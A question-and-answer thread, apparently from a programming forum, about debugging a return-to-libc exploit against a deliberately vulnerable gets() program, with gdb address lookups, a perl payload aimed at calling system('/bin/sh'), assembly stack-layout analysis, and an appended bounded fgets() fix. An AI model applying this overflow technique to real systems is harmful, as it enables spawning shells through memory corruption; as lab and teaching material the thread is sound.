return to libc - problem
Problem description
I'm having problems with a return-to-libc exploit. The problem is that nothing happens, but there's no segmentation fault (and yes, I'm actually overflowing the stack).
Here's my program:
#include <stdio.h>   /* gets() is declared here; the overflow itself is intentional */
int main(int argc, char **argv) {
char array[512];
gets(array);         /* no bound: input longer than 512 bytes overwrites what follows array */
}
I'm using gets instead of strcpy, because my addresses start with 0x00 and strcpy thinks it's the end of a string, so I can't use it.
Here are the addresses that I need:
$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb) x/s 0xbffffe3f
0xbffffe3f: "/bin/sh"
When inputting the right sequence, this happens:
eleanor@eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor@eleanor32:~/testing/root$
So nothing.
But if I enter 520 'A's (0x41), then EIP is overwritten with 'A's. If there are 516 'A's, nothing happens, but EIP contains the system address, followed by the exit address, followed by the /bin/sh pointer.
Why does nothing happen?
Answer
Let's do some asm first:
code
$ cat gets.c
#include <stdio.h>
int main(int argc, char **argv) {
char array[512];
gets(array);
}
ASM
$ gcc gets.c -o gets.s -S -fverbose-asm
$ cat gets.s
....
.globl main
.type main, @function
main:
leal 4(%esp), %ecx #,
andl $-16, %esp #,
pushl -4(%ecx) # (1)
pushl %ebp # 2
movl %esp, %ebp #,
pushl %ecx # 3
subl $516, %esp #,
leal -516(%ebp), %eax #, tmp60
movl %eax, (%esp) # tmp60,
call gets # << break here
addl $516, %esp #, << or here to see the stack picture
popl %ecx # (3')
popl %ebp # (2')
leal -4(%ecx), %esp # (1')
ret
.size main, .-main
The prologue and epilogue (these are for aligned code) are described in detail here: Understanding the purpose of some assembly statements (http://stackoverflow.com/questions/4228261/understanding-the-purpose-of-some-assembly-statements/4228936#4228936)
Stack layout:
(char) array[0]
...
(char) array[511]
(32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to
(32bit) $ebp - pushed by 2
(32bit) $esp - pushed by 1 - change the $esp to the original value
So, if you want to change the return address of main, you should not only change the address on the stack that will be used by ret, but also repeat the values saved on the stack by the (1), (2), (3) pushes. Or you can embed a new return address in the array itself and overwrite only (3) with your new stack address + 4. (use a 516-byte string)
I suggest you use this source code to hack it:
$ cat getss.c
#include <stdio.h>
void f(void)
{
char array[512];
gets(array);
}
int main(int argc, char **argv) {
f();
}
because f has no problems with stack realignment:
.globl f
.type f, @function
f:
pushl %ebp #
movl %esp, %ebp #,
subl $520, %esp #,
leal -512(%ebp), %eax #, tmp59
movl %eax, (%esp) # tmp59,
call gets #
leave
ret
.size f, .-f
Stack layout of f():
(char) array[0]
...
(char) array[511]
(32bit) old ebp
(32bit) return address
Breakpoint at the ret instruction in f() with 520 bytes of "A":
(gdb) x/w $sp
0xXXXXXa3c: 0x41414141
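For contrast with the gets(array) program the whole thread revolves around, here is an added example (not code from the question or the answer) of the bounded counterpart: fgets() never writes past the 512-byte array, so the saved ecx/ebp and return address slots described above stay intact, and an over-long line is drained instead of spilling into the next read. read_line_bounded and demo_overlong_input are hypothetical names; fmemopen is used only to feed a constructed in-memory input.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Hardened counterpart of gets(array): fgets() stops at n - 1 bytes, so the
 * saved registers and return address past array[511] cannot be overwritten.
 * An over-long line is drained so its tail is not read as the next line.
 * Returns 1 if the line was truncated, 0 if it fit, -1 on EOF/error. */
int read_line_bounded(FILE *fp, char *buf, size_t n)
{
    if (fgets(buf, (int)n, fp) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    int c = fgetc(fp);               /* no newline: buffer full or last line */
    if (c == EOF)
        return 0;                    /* unterminated last line, but it fit */
    while (c != '\n' && c != EOF)    /* drop the rest of the over-long line */
        c = fgetc(fp);
    return 1;
}

/* Hypothetical helper: feed input_len bytes of 'A' (constructed, like the
 * question's perl payload of 516 bytes) through read_line_bounded() into a
 * 512-byte array and report how many bytes were actually stored. */
int demo_overlong_input(size_t input_len, size_t *stored_len)
{
    static char input[1024];
    static char array[512];          /* same size as the original array[512] */
    if (input_len == 0 || input_len >= sizeof input)
        return -1;
    memset(input, 'A', input_len);
    input[input_len] = '\0';
    FILE *fp = fmemopen(input, input_len, "r");
    if (fp == NULL)
        return -1;
    int truncated = read_line_bounded(fp, array, sizeof array);
    fclose(fp);
    *stored_len = strlen(array);
    return truncated;
}
```

With the question's 516-byte input, demo_overlong_input reports truncation and 511 stored bytes; nothing beyond the array is touched.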